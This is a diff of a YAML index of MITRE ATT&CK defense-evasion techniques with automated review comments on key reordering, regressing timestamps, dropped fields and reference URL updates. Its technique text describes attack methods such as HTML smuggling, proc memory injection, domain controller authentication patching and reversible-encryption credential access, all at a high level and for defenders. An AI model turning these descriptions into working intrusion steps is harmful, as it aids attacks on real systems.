An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
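Review bot: most of this hunk is key reordering rather than a content change: the `x_mitre_platforms`, `x_mitre_domains`, `id`, `created` and `external_references` lines removed from T1578.002 here reappear further down in the same object, and the only substantive edits are the `modified` timestamp and the Mandiant URL (from `https://content.fireeye.com/m-trends/rpt-m-trends-2020` to a `mandiant.com` PDF). The same pattern repeats for every technique in this diff. Emitting keys in a fixed order when regenerating the index, or reviewing with a key-order-insensitive YAML diff, would make the real changes visible; as it stands a reviewer has to pair each removed line with its re-added copy to confirm nothing was lost. Separately, `spec_version: '2.1'` is removed from T1556.009 here and from every other technique below; confirm that no consumer of this index reads that key.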
@@ -11714,20 +11939,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the RunInstances
event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create
to create a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Creation'
- 'Instance: Instance Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+ created: '2020-05-14T14:45:15.978Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/002
+ external_id: T1578.002
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.009:
technique:
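Review bot: the Mandiant reference keeps `Retrieved April 24, 2020` while its URL now points at `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf`, whose `2021-09` path segment postdates that retrieval date; elsewhere in this diff a URL change is paired with a refreshed retrieval date (the nccgroup reference, now `Retrieved September 12, 2024`), and the two cases should be handled the same way. Content-wise the hunk adds the contributor `Arun Seelagan, CISA`, bumps `x_mitre_version` from `1.1` to `1.2`, drops `x_mitre_permissions_required: - User` and moves `x_mitre_attack_spec_version` from `2.1.0` to `3.2.0`. The dropped permissions key also disappears from T1556.001 and T1556.005 below, so check that no index column or report still expects it.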
@@ -11757,7 +12012,7 @@ defense-evasion:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
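Review bot: the `modified` timestamp for T1055.009 moves backwards, from `2021-04-29T14:49:39.188Z` to `2020-06-20T22:25:55.331Z`. A last-modified date should not regress on a regeneration. The old value has the look of a bulk release stamp (T1601.001 below carries the same `14:49:39.188Z` time, and several other techniques in this diff share `14:00:00.188Z`), so the likely explanation is that the new source bundle records per-object edit times rather than the release time. If that is the case, say so in the commit message and confirm the new source is the intended ATT&CK release; if not, the older date indicates the object was regenerated from a stale bundle.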
@@ -11800,8 +12055,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1601.001:
technique:
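Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed from T1055.009 with no replacement in this hunk, whereas the other techniques in this diff are moved to `x_mitre_attack_spec_version: 3.2.0`. Confirm the key is set elsewhere in the T1055.009 object (it is not in the portion shown) or add it; an object with no spec version at all will look older than the objects around it.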
@@ -11848,7 +12101,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:46.560Z'
name: Patch System Image
description: "Adversaries may modify the operating system of a network device
to introduce new capabilities or weaken existing defenses.(Citation: Killing
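Review bot: `modified` for T1601.001 regresses from `2021-04-29T14:49:39.188Z` to `2020-10-22T17:50:46.560Z`; the reference and description lines in context are unchanged, so this is a change of source bundle rather than an edit to the technique. The commit message should name the ATT&CK release the index was regenerated from so backwards-moving timestamps can be checked against it.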
@@ -11914,12 +12167,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T22:30:01.227Z'
name: Clear Persistence
description: |-
Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
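Review bot: two points in this hunk. `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed from T1601.001 with no replacement spec version visible; confirm `x_mitre_attack_spec_version` is set elsewhere in that object or add `3.2.0` as the reordered objects do. And T1070.009's `modified` moves backwards from `2023-05-09T14:00:00.188Z` to `2023-04-11T22:30:01.227Z`, consistent with the source bundle now carrying per-object edit times instead of release stamps, which should be stated once in the commit message.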
@@ -11974,33 +12225,84 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
- T1556.001:
+ T1036.010:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-10-17T15:20:36.705Z'
+ name: Masquerade Account Name
+ description: "Adversaries may match or approximate the names of legitimate accounts
+ to make newly created ones appear benign. This will typically occur during
+ [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+ may also be renamed at a later date. This may also coincide with [Account
+ Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+ deletes an account before re-creating one with the same name.(Citation: Huntress
+ MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+ such as those associated with legitimate software, data backups, or container
+ cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+ Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+ such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+ 2024) Sometimes adversaries may model account names off of those already existing
+ in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+ \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+ which describes impersonating specific trusted individuals or organizations,
+ rather than user or service account names. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Menachem Goldstein
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - SaaS
+ - IaaS
+ - Containers
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Creation'
type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
+ id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+ created: '2024-08-05T21:39:16.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1036/010
+ external_id: T1036.010
+ - source_name: Elastic CUBA Ransomware 2022
+ description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+ Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+ August 5, 2024.
+ url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+ - source_name: Invictus IR Cloud Ransomware 2024
+ description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+ August 5, 2024.
+ url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+ - source_name: Huntress MOVEit 2023
+ description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+ CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+ url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+ - source_name: Aquasec Kubernetes Attack 2023
+ description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+ Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+ 2023.
+ url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.001:
+ technique:
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
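Review bot: the T1036.010 description string carries upstream whitespace noise: the `\ \n\n` escape before `Note that this is distinct` (a literal space followed by two newlines) and the trailing space before the closing quote in `service account names. "`. Both are harmless to the YAML parser but propagate into any rendered index; if the generator normalizes description text anywhere, trimming trailing whitespace there would remove them. The empty `x_mitre_detection: ''` on this new technique, with `User Account: User Account Creation` listed under `x_mitre_data_sources`, follows the newer ATT&CK practice of placing detection guidance in data components rather than the detection field, so that is not a defect. Note also that T1556.001's `technique:` block appears in this hunk only because the new object was inserted ahead of it; the key itself is not renamed.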
@@ -12021,6 +12323,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
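Review bot: the detection text shown in context reads `Monitor for calls to OpenProcess` / `that can be` / `used to manipulate lsass.exe`, with a line break on each side of `OpenProcess` where upstream uses inline code formatting that the generator stripped. It is not touched by this change, but the same stripped-markup breaks recur around `Set-ADUser` / `Set-ADAccountControl` and `del` / `rm` / `unlink` further down, so if the generator is being revisited anyway, preserving the code span as backticks, or at least joining the line, would make the detection guidance readable.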
@@ -12035,22 +12338,42 @@ defense-evasion:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.006:
technique:
- modified: '2023-07-14T14:01:41.475Z'
+ modified: '2024-09-12T19:12:13.006Z'
name: HTML Smuggling
description: |-
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
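Review bot: T1556.001's `x_mitre_version` goes from `2.0` to `2.1` and `x_mitre_permissions_required: - Administrator` is dropped; the external references are re-emitted unchanged apart from `description` now preceding `url`. The detection text in context still describes manipulating `lsass.exe` on a domain controller, so the administrator requirement survives only in prose; if any index or report column was populated from `x_mitre_permissions_required`, it will go blank for this technique and the others where the key is removed in this diff.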
@@ -12108,48 +12431,17 @@ defense-evasion:
url: https://www.menlosecurity.com/blog/new-attack-alert-duri
- source_name: nccgroup Smuggling HTA 2017
description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
- Explorer/Edge. Retrieved May 20, 2021.
- url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+ Explorer/Edge. Retrieved September 12, 2024.
+ url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.006
atomic_tests: []
T1556.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
- type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
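Review bot: the nccgroup reference is the model for URL updates in this diff: the URL moves from `research.nccgroup.com/2017/08/08/...` to `www.nccgroup.com/us/research-blog/...` and `Retrieved May 20, 2021` becomes `Retrieved September 12, 2024` in the same edit. The `x_mitre_attack_spec_version` bump to `3.2.0` for T1027.006 is fine. The T1556.005 removals that follow are pure reordering (the same `id`, `created` and four references reappear later in the object); the only content edit to T1556.005 in this hunk is the `modified` timestamp.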
@@ -12171,6 +12463,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -12181,23 +12474,50 @@ defense-evasion:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:43:18.873Z'
name: Command Obfuscation
description: |-
Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
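Review bot: for T1556.005 this hunk bumps `x_mitre_version` from `1.0` to `1.1`, adds the `x_mitre_domains` and `x_mitre_platforms` keys in their new position, moves `x_mitre_attack_spec_version` from `2.1.0` to `3.2.0`, and removes `x_mitre_permissions_required` with both `User` and `Administrator`. The four references are the same as before, re-ordered with `dump_pwd_dcsync` first and `description` ahead of `url`. If the permissions key is being dropped to follow the upstream schema, the commit message should say so, because it is the one removal in this diff that loses information rather than moving it.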
@@ -12238,8 +12558,9 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1027/010
external_id: T1027.010
- source_name: Twitter Richard WMIC
- description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
- url: https://twitter.com/rfackroyd/status/1639136000755765254
+ description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+ 2024.
+ url: https://x.com/rfackroyd/status/1639136000755765254
- source_name: Invoke-Obfuscation
description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
March 17, 2023.
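Review bot: the URL for `Twitter Richard WMIC` moves to `https://x.com/rfackroyd/status/1639136000755765254` with the retrieval date refreshed to September 12, 2024, which is the right pairing. Keep the `source_name` exactly as `Twitter Richard WMIC`: it is the key that `(Citation: ...)` markers in technique descriptions resolve against, so renaming it to match the new domain would silently break those citations.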
@@ -12275,43 +12596,23 @@ defense-evasion:
url: https://redcanary.com/threat-detection-report/techniques/powershell/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1070.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Walker Johnson
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
- created: '2020-01-31T12:35:36.479Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1070.004
- url: https://attack.mitre.org/techniques/T1070/004
- - source_name: Microsoft SDelete July 2016
- url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
- description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
- 8, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:33:59.107Z'
+ name: 'Indicator Removal on Host: File Deletion'
description: |-
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del
on Windows and rm
or unlink
on Linux and macOS.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Indicator Removal on Host: File Deletion'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Walker Johnson
+ x_mitre_deprecated: false
x_mitre_detection: It may be uncommon for events related to benign command-line
functions such as DEL or third-party utilities or tools to be found in an
environment, depending on the user base and how systems are typically used.
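Review bot: the re-emitted `name: 'Indicator Removal on Host: File Deletion'` for T1070.004 still uses the pre-v12 parent technique name even though `modified` now reads `2024-10-15T16:33:59.107Z`; ATT&CK renamed T1070 to `Indicator Removal` in v12. If `name` is sourced from the project's own atomic metadata rather than the STIX object, that is where the update belongs. Also visible in context: the description is broken across lines around `del`, `rm` and `unlink`, the same stripped inline-code formatting seen in other detection and description fields in this diff.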
@@ -12322,18 +12623,36 @@ defense-evasion:
network that an adversary could introduce. Some monitoring tools may collect
command-line arguments, but may not capture DEL commands since DEL is a native
function within cmd.exe.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Deletion'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+ created: '2020-01-31T12:35:36.479Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/004
+ external_id: T1070.004
+ - source_name: Microsoft SDelete July 2016
+ description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+ 8, 2018.
+ url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.004
atomic_tests: []
T1221:
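Review bot: `- spec_version: '2.1'` is dropped from T1070.004 here, and from every other technique in this diff, while `type`, `id`, `created`, `revoked` and `x_mitre_attack_spec_version: 3.2.0` (replacing `2.1.0`) are added. That pattern is what a switch of source bundle looks like (STIX 2.1 objects carry `spec_version`, STIX 2.0 objects do not), so the PR description should say which data set the index is now built from, and the consumers of this YAML should be checked for anything that keys on `spec_version` before this merges.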
@@ -12395,7 +12714,7 @@ defense-evasion:
description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
2018.
source_name: ryhanson phishery SEPT 2016
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-12T18:16:56.176Z'
name: Template Injection
description: |-
Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
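Review bot: `modified` for T1221 moves backwards, from '2022-05-11T14:00:00.188Z' to '2022-01-12T18:16:56.176Z', and the same regression appears further down for T1134, T1564.005, T1055.005, T1622, T1574.002, T1055.008, T1027.007 and T1564.001, while T1216.002, T1548.006, T1055.015, T1484 and T1220 move forward. Every old value that regresses has the bulk-stamp shape `T14:00:00.188Z` (or `T14:49:39.188Z`), so the new values look like per-object edit timestamps rather than release-wide restamps; that is probably benign, but it should be stated in the PR description, and anything that compares `modified` to decide whether a technique changed since the last index build will see these as rollbacks. The 'compromised of' in the retained description text is upstream wording and is not this PR's to fix.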
@@ -12425,13 +12744,11 @@ defense-evasion:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1221
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
